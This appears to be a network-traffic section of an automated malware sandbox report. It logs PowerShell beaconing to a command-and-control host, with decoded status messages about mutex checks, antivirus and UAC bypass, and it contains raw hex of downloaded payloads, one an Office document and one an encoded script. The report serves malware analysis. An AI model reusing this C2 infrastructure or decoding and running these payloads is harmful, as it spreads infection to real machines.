30 56 65 56 53 46 56 6c 79 6b 63
                                                                                  Data Ascii: ikWUOrdlSIWoSMT{WFXl0F`VKIWj0VWTT2SGGw[1mEPVeKPUCMRTOC[1mIcF0MP0KvX{GVPmDvNYe`W{SoUGeVdDmDSYCDTV8oRTOC[3W2LDuKP1GoRTOC[1mEPVuiVD4VTWWNTFOIWoWKSECoR1WjcFSELTqjS0[1WTiJelOIWomjRFuoT1W1UWSTbFOWLkmu[Dij`FOuWlOTW3ypX314dlHxVkCXSlSvXl0RelP{UlOSL0[4X30VeVSFVlykc


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.11.2049720104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:40:59 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec3375 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 85
                                                                                  2024-11-08 09:40:59 UTC85OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
                                                                                  2024-11-08 09:40:59 UTC940INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:40:59 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dCxPCERqItx5U96hd7m1QC6k7iK%2FOhDVe9VxIomxIvKEnfHzWCvZRa8BVspGbCmPwk6oOF0H5q2xrJullvozL%2BSI2h7Lw0Q7LLOioMCzXZw7nRxa0AyfOXXzgD26OjhzVEUhDdPrG9dr"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10321&sent=3162&recv=1511&lost=0&retrans=0&sent_bytes=4418208&recv_bytes=10214&delivery_rate=58254364&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49acf3d7a4255-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102144&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1034&delivery_rate=37434&cwnd=251&unsent_bytes=0&cid=63b60b580b32fdce&ts=799&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.11.2049721104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:00 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec3375 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 86
                                                                                  2024-11-08 09:41:00 UTC86OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
                                                                                  2024-11-08 09:41:01 UTC943INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:01 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=atSFIzi4EoE5FyLZ9r4xwTtXJbc5j5%2B%2BX8RyvtJ3k26o46o%2FnnrGXteVkAjD26Eg4nx7m7rzVghOD629hsnsLjzZEmJdYwAxBRC3ws6d919md%2Fa72dso7SBPjySgFkZ3dpv4c43fHdBk"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1563&sent=11197&recv=5228&lost=0&retrans=0&sent_bytes=15869497&recv_bytes=7036&delivery_rate=10138888&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49ad61a147ffa-IAD
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=108338&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1035&delivery_rate=35285&cwnd=89&unsent_bytes=0&cid=ed35998b52bc4424&ts=811&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.11.2049722104.21.86.2194433608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:00 UTC394OUTGET /file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291528d4a91f7de007736d3e869533e8ac791d776d249137edcf1b9b5f94cc9d5f29e8e79927784ba6e51196374f4288c79ddab7570b96946bdaadd59ccadec0a22e27ea0a0592f1b7a24bc844a7199b7ee8 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-11-08 09:41:01 UTC1065INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:01 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 13576
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=file; filename*=UTF-8''file
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZT%2F3fX4d%2FW52Lpmsy%2BV%2BSYyw7JZHWLuu%2BYr2VxASvJq3aLEL4zvHnzwHAT4b1ExjzDxx8f31iLsvQfUgs9eAJm8Q8C%2Fp89TaeElNOlDmFkmSpEsJWAI%2BTaSXi8VnJAvzeiO9aG4FYCV7"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13425&sent=3174&recv=1522&lost=0&retrans=0&sent_bytes=4419873&recv_bytes=18585&delivery_rate=58254364&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49ad9cdd80f63-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102104&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1008&delivery_rate=37470&cwnd=252&unsent_bytes=0&cid=97ccacd06af70842&ts=808&x=0"
                                                                                  2024-11-08 09:41:01 UTC304INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 df a4 d2 6c 5a 01 00 00 20 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: PK!lZ [Content_Types].xml (
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: a7 c5 89 85 2c 09 a1 09 89 2f fb 7c 66 5c 12 5a fe e7 8a e6 19 3f 36 ef 21 59 b4 5f e1 6f 1b 9c 5d 41 f3 01 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 cb 81 d6 93 39 07 00 00 7f 25 00 00 11 00 00 00 77 6f 72 64 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c e4 5a db 72 db 36 10 7d ef 4c ff 01 a3 97 b6 33 8e 79 11 2f a2 26 56 86 92 ec d4 ed b4 f5 c4 ed f4 19 22 21 11 35 49 b0 00 28 59 fd fa ee 92 a2 ae 76 4a 49 4e 53 a7 7e 08 29 80 38 bb d8 3d 7b 01 99 b7 ef 1e b3 94 cc 99 54 5c e4 57 1d eb d2 ec 10 96 47 22 e6 f9 ec aa f3 db af 37 6f 7a 1d a2 34 cd 63 9a 8a 9c 5d 75 96 4c 75 de 0d be fe ea ed a2 1f 8b a8 cc 58 ae 09 40 e4 aa bf 28 a2 ab 4e a2 75 d1 37 0c 15 25 2c a3 ea 32 e3 91 14 4a 4c f5 65 24 32 43 4c a7 3c 62 c6 42 c8 d8 b0 4d cb ac ee 0a 29
                                                                                  Data Ascii: ,/|f\Z?6!Y_o]APK!9%word/document.xmlZr6}L3y/&V"!5I(YvJINS~)8={T\WG"7oz4c]uLuX@(Nu7%,2JLe$2CL<bBM)
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: 9b ca 44 84 c4 47 31 c3 e5 ac 4e 79 b0 af 66 72 8b d1 6d 12 9a 37 0a a0 b4 bb 18 b7 af b5 61 f1 c6 be e3 58 bb 1b b0 6e 5c df 71 dd 9b 2f 2d a1 0d c6 a5 ac 5b 99 b5 97 2f c8 62 15 96 ab 5a f7 df 0f 96 a7 c5 6c 7a b0 97 ca 57 37 20 61 22 c4 03 1c 93 15 b9 2f e0 dc 4c 53 ae f4 8b c7 3e f6 20 09 9d 43 e1 90 0c 78 09 31 a9 04 04 75 f3 6d 4f 35 b9 21 11 45 15 a0 cb 75 96 80 56 24 61 69 81 31 5e 42 1f 22 ab af 84 8d 83 21 6b 46 ac d0 0a 1e c4 9e b5 4d 38 bb 63 cb 0a dd 31 f2 fe 75 86 33 9c 9f 5c a7 67 e1 e9 f3 bf be 81 97 60 ce ed 56 1e c7 94 3f 2d 25 96 00 e0 43 fd 05 01 ea 25 a6 fb 8a 5c 38 ff 67 c9 24 67 40 a8 a2 2e 1f 53 c6 52 32 85 5e 66 75 a0 d1 34 aa ea c9 9c 53 c2 32 a8 40 b8 ba 48 44 ce 90 a3 0d eb 32 21 91 87 34 07 e0 a2 58 e2 5a aa 14 44 46 a5 0c 70
                                                                                  Data Ascii: DG1Nyfrm7aXn\q/-[/bZlzW7 a"/LS> Cx1umO5!EuV$ai1^B"!kFM8c1u3\g`V?-%C%\8g$g@.SR2^fu4S2@HD2!4XZDFp
                                                                                  2024-11-08 09:41:01 UTC517INData Raw: a5 51 8e 11 49 5c 27 41 31 a8 bd 31 99 90 11 76 0e 94 4a 77 67 a5 7c 40 e1 5f 22 85 1a 18 51 be af 54 63 43 42 63 c7 d3 aa fa 12 0b 11 50 ee 1c 21 da 71 61 9d 31 3b 3e c0 f7 a5 eb 50 24 24 4c 74 dc 8a fe 73 cb 3b 17 ca 6b 21 2a 0b 64 73 72 43 fd b7 94 5b 0a 8c a7 35 2d c7 c3 c3 b5 a0 e7 f9 5e a3 bb d6 af 01 54 6e e3 06 cd 41 63 d0 58 eb d3 00 34 1a c1 4e 53 2e a6 ce 66 2d f0 96 d8 1c 28 6d 5a 74 f7 9b fd 7a d5 c0 e7 f4 d7 b7 f0 5d 5f 7d 0c bc 06 a5 4d 6f 0b 3f 1c 06 99 0d 73 a0 b4 e9 6f e1 fd 5e bb d7 37 f5 6b 50 da 6c 6c e1 9b 95 6e df 6b 1a 78 0d 8a 28 49 a6 5b e8 8a df a8 07 ab dd ae 21 13 46 2f 5b e1 6d df 1b 36 6b 4b 78 86 2a e7 a2 2b 95 4f 64 51 ac c5 e8 1e e3 43 00 68 e7 22 49 12 47 2e 66 78 82 46 80 0b 10 25 87 9c 38 bb 24 8c 20 f0 66 28 61 02 86
                                                                                  Data Ascii: QI\'A11vJwg|@_"QTcCBcP!qa1;>P$$Lts;k!*dsrC[5-^TnAcX4NS.f-(mZtz]_}Mo?so^7kPllnkx(I[!F/[m6kKx*+OdQCh"IG.fxF%8$ f(a
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: 24 06 bf 2c 6c 04 c1 df 86 6d f6 ee 38 3d 46 6d ea fb f8 c8 44 c2 d9 40 d4 a6 12 53 c3 8c 97 d0 5c a2 d8 ca 18 c5 34 8f dc 45 32 b2 91 dc 5f f0 91 61 70 21 c1 d3 21 a6 cc 19 8c b1 10 36 99 1b 7c 61 d0 bd 06 69 c6 ee f6 3d ba 88 4d 24 97 64 6a 43 ee 22 c6 f2 c8 3e 9b 06 11 8a 67 56 ce 24 89 f2 d8 2b 62 0a 21 8a 9c 9b 4c 5a 49 30 f3 84 a8 3e f8 01 25 85 ee be 43 b0 e1 ee b7 9f ed db 90 86 ec 01 a2 66 e6 dc 76 24 30 33 cf e3 82 4e 10 b6 29 ef f2 d8 48 b1 5d 4e ac d1 d1 9b 87 46 68 ef 62 4c d1 31 1a 63 ec dc be 62 c3 b3 99 61 f3 8c f4 d5 08 b2 ca 65 6c b3 cd 55 64 c6 aa ea 27 58 40 ad a4 8a 1b 8b 63 89 30 42 76 1f 87 ac 80 cf de 62 23 f1 2c 50 12 23 5e a4 f9 fa d4 0c 99 01 5c 75 b1 35 5e e9 68 6a a4 52 c2 d5 a1 b5 93 b8 21 62 63 7f 85 5a 6f 46 c8 08 2b d5 17
                                                                                  Data Ascii: $,lm8=FmD@S\4E2_ap!!6|ai=M$djC">gV$+b!LZI0>%Cfv$03N)H]NFhbL1cbaelUd'X@c0Bvb#,P#^\u5^hjR!bcZoF+
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: 18 14 e4 e9 34 8e 61 c3 11 82 e5 3e 0f c5 a7 f1 0c 76 3c b4 4d 6c 3c f8 b5 60 f6 08 70 75 12 45 d2 f3 71 d8 87 35 df e3 d2 d8 e0 d5 69 74 fe 8c 42 6b 8b 0c 5a 21 bd ab 48 cb 48 4e db 60 ba a3 db f2 36 df 9a 1d 53 81 35 74 4f 73 85 54 7d bf 9b f2 e3 45 76 b7 14 52 a1 9c 41 38 50 86 1d a8 a4 8e 8b ce fe 87 03 b1 0f b7 24 4f 4e 6e f3 60 17 90 9d 4b e8 3a cf 52 f2 ce 26 2b 89 2a e0 ea 41 cb 8a a2 20 b4 00 26 0b 54 31 f3 80 f2 b9 91 25 a8 ac 11 84 7a 9e 78 58 a1 0d 5c 86 0f 8a e2 5b a9 e8 b3 14 06 b1 79 89 0a 10 7a e5 78 a7 4c 75 c9 d0 b6 55 bc 6e ad 6f a0 5b 6e bd 45 72 a0 ff 37 51 86 16 ff ab 5d ac 90 42 85 21 aa 71 3f 01 17 4a 32 af 85 e5 27 69 26 d0 20 15 dc df c6 c2 b5 cb 76 35 af 5b 2f 58 08 c4 21 8f 07 ed 74 26 31 f4 c6 4d 56 29 7a fc 81 5b 83 3a 07 e9
                                                                                  Data Ascii: 4a>v<Ml<`puEq5itBkZ!HHN`6S5tOsT}EvRA8P$ONn`K:R&+*A &T1%zxX\[yzxLuUno[nEr7Q]B!q?J2'i& v5[/X!t&1MV)z[:
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: 61 d5 5f ab b9 cb ed 77 a6 e0 25 0b 85 29 87 cd 0b ae 12 c7 fe 64 4f 43 63 a1 f3 d4 c1 f1 c7 d5 9b 1f a5 96 80 95 85 ac 0b 31 80 ea ef 1a 3b 06 3d ae f2 89 ca 2e d3 2a c9 a9 6f f9 fc 46 86 8f 3c 9a 16 ea 8b b3 91 29 4b 7d f8 f3 fa 2e 13 32 53 89 ec 6c f4 d1 94 a9 3e 9c f2 44 5c 89 28 e2 a9 f5 c3 74 21 22 fe 6b c1 d3 9f 39 8f 36 9f ff f9 d5 24 a3 fa 83 50 96 a9 7a 7d 78 32 31 a3 20 ce a3 2f 2f 21 5f ea d4 a6 be 4d 99 d6 e4 9b 0e 88 f5 af 4b b1 29 dc 84 ff 77 05 db af 95 68 8b 5f 70 a6 f3 7b b0 bf 8d 30 d5 47 21 0e 74 44 6e b5 b6 9d 59 6e b5 dd fc 0a 55 d0 e1 5b 15 74 f4 56 05 1d bf 55 41 93 b7 2a e8 e4 ad 0a fa f0 56 05 19 cc 5f 59 90 48 23 95 fe cd ef 61 31 80 ba 8b e3 70 23 9a e3 30 1b 9a e3 f0 12 9a e3 b0 0a 9a e3 70 02 9a e3 18 e8 68 8e 63 1c a3 39 8e
                                                                                  Data Ascii: a_w%)dOCc1;=.*oF<)K}.2Sl>D\(t!"k96$Pz}x21 //!_MK)wh_p{0G!tDnYnU[tVUA*V_YH#a1p#0phc9
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: b8 11 bd 13 90 1b d1 2b 13 39 c3 51 29 c9 4d e9 9d 9b dc 88 de 49 ca 8d 40 67 2b b8 45 c0 65 2b 18 8f cb 56 30 de 27 5b 41 8a 4f b6 1a 30 0b 70 23 7a 4f 07 dc 08 b4 51 21 02 6d d4 01 33 05 37 02 65 54 10 ee 65 54 48 41 1b 15 22 d0 46 85 08 b4 51 e1 04 0c 67 54 18 8f 33 2a 8c f7 31 2a a4 f8 18 15 52 d0 46 85 08 b4 51 21 02 6d 54 88 40 1b 15 22 d0 46 f5 9c db 3b c3 bd 8c 0a 29 68 a3 42 04 da a8 10 81 36 aa 99 2f 0e 30 2a 8c c7 19 15 c6 fb 18 15 52 7c 8c 0a 29 68 a3 42 04 da a8 10 81 36 2a 44 a0 8d 0a 11 68 a3 42 04 ca a8 20 dc cb a8 90 82 36 2a 44 a0 8d 0a 11 68 a3 56 97 1a fa 1b 15 c6 e3 8c 0a e3 7d 8c 0a 29 3e 46 85 14 b4 51 21 02 6d 54 88 40 1b 15 22 d0 46 85 08 b4 51 21 02 65 54 10 ee 65 54 48 41 1b 15 22 d0 46 85 08 b4 51 cd c1 c2 01 46 85 f1 38 a3 c2
                                                                                  Data Ascii: +9Q)MI@g+Ee+V0'[AO0p#zOQ!m37eTeTHA"FQgT3*1*RFQ!mT@"F;)hB6/0*R|)hB6*DhB 6*DhV})>FQ!mT@"FQ!eTeTHA"FQF8
                                                                                  2024-11-08 09:41:01 UTC1369INData Raw: 86 1f 23 b8 7f d8 49 11 6c 99 36 1c d4 22 44 93 38 0c 98 22 40 b9 5a 2f c2 9f 2f 4f 77 45 18 18 8b 15 c5 02 14 5b 84 7b 66 c2 87 e5 c7 0f f7 ed bc 65 e5 33 b3 d6 9d 69 02 47 51 66 2e c9 22 ac ad 6d e6 51 64 48 cd 24 36 13 68 98 72 8b 15 68 89 ad 9b ea 75 24 b1 fe b5 69 ee 08 c8 06 5b 5e 72 c1 ed 3e 4a e2 38 0f 7b 8c 7e 0f 05 aa 8a 13 f6 08 64 23 99 b2 9d 3e d2 4c 38 22 28 53 f3 c6 1c 69 ed 7b 68 2d 68 da 68 20 cc 18 d7 8f 14 07 9e c4 5c 9d 30 68 7a 01 92 9c 68 30 50 d9 89 6b a6 af a8 43 39 39 8a bb 48 8a 33 20 1b 07 48 2e 00 39 61 bb 71 8c a2 67 44 4e 39 e4 70 3a 8e 93 9f 38 9c 0e 38 ff 56 cc 00 40 37 a3 10 49 7a ac c3 0f 5e 3e 60 19 6a 69 3d 0e 77 f4 28 f2 5a 6c 71 8d 4d 3d 24 b2 71 0d 66 27 dc 5e fa fb 2d c9 fc cb 5a 81 c6 a5 70 24 f7 04 05 ee 21 08 3a
                                                                                  Data Ascii: #Il6"D8"@Z//OwE[{fe3iGQf."mQdH$6hrhu$i[^r>J8{~d#>L8"(Si{h-hh \0hzh0PkC99H3 H.9aqgDN9p:88V@7Iz^>`ji=w(ZlqM=$qf'^-Zp$!:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.11.2049723104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:01 UTC289OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec3375 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 62
                                                                                  2024-11-08 09:41:01 UTC62OUTData Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                  Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
                                                                                  2024-11-08 09:41:02 UTC946INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:02 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1EoUHlxsQJK1RR886Bz%2Bt5pK90%2BgqpUf0%2B3UOr%2FPwRHwaLT5eAlpzY5KQmongHJG5VUCTIgtM0YX7vhaIapxPpCxLZYsUQxvKplOfhROHV30h7YVNArMyo8juA7K6LMJrnXZi%2Bz38YoB"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7441&sent=11200&recv=5231&lost=0&retrans=0&sent_bytes=15870248&recv_bytes=7890&delivery_rate=10138888&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49adc9b5943b2-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102210&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1011&delivery_rate=37427&cwnd=252&unsent_bytes=0&cid=ae5843904863e97e&ts=827&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.11.2049727104.21.86.2194433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:41:05 UTC394OUTGET /file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2554dddacd02abc7f91da6751ccce90dd4887b116455e49be81db10f80baa11a424f005d6dbdad754876d59e5f460b1c4ffba9cdd1a4c397055a028e02621e6d4ce144e0fe818b70e621c9f4f876791 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Connection: Keep-Alive
                                                                                  2024-11-08 09:41:06 UTC1066INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:41:06 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 12154
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yr2eW9PrDceoi1ISHjtQWL4YFHaNPr%2FDMIyTygQn1rH%2B6CiQqiYrGK9hm9gVRuE3WX07KdN2P5OG0qg6t%2B8hbTlivIGJXu60%2BFk%2FRCW27r4eazJKsml%2FWwaGn32hgI%2FfxcOb41yE05Uj"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8343&sent=3185&recv=1527&lost=0&retrans=0&sent_bytes=4434307&recv_bytes=19593&delivery_rate=58254364&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49af54b1942e9-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102043&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1008&delivery_rate=37488&cwnd=225&unsent_bytes=0&cid=e863cb5d45b73046&ts=799&x=0"
                                                                                  2024-11-08 09:41:06 UTC303INData Raw: 25 70 60 65 60 63 64 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 53 56 65 4d 64 6b 43 6f 52 6a 69 4e 4c 46 4f 75 63 49 57 60 4c 44 71 33 56 6a 69 73 4f 31 53 53 63 33 65 4b 50 31 47 6f 58 57 65 5b 63 31 71 49 5b 49 4f 68 4c 6a 71 6e 58 6a 53 76 52 30 53 47 52 6d 6d 57 4c 59 43 4b 57 33 75 56 50 6a 79 75 64 46 79 68 63 56 50 76 58 54 4f 43 65 47 6e 7b 54 56 65 4f 54 33 75 4e 50 33 6d 43 5b 31 6d 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6a 4c 31 71 76 5b 44 65 57 65 46 47 49 4e 59 71 6a 50 31 47 71 58 7b 4b 56 65 57 71 45 50 6f 4f 68 4c 6c 4f 71 55 32
                                                                                  Data Ascii: %p`e`cdq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#SVeMdkCoRjiNLFOucIW`LDq3VjisO1SSc3eKP1GoXWe[c1qI[IOhLjqnXjSvR0SGRmmWLYCKW3uVPjyudFyhcVPvXTOCeGn{TVeOT3uNP3mC[1mEPkeDTV8oRTOC[1mEPVejL1qv[DeWeFGINYqjP1GqX{KVeWqEPoOhLlOqU2
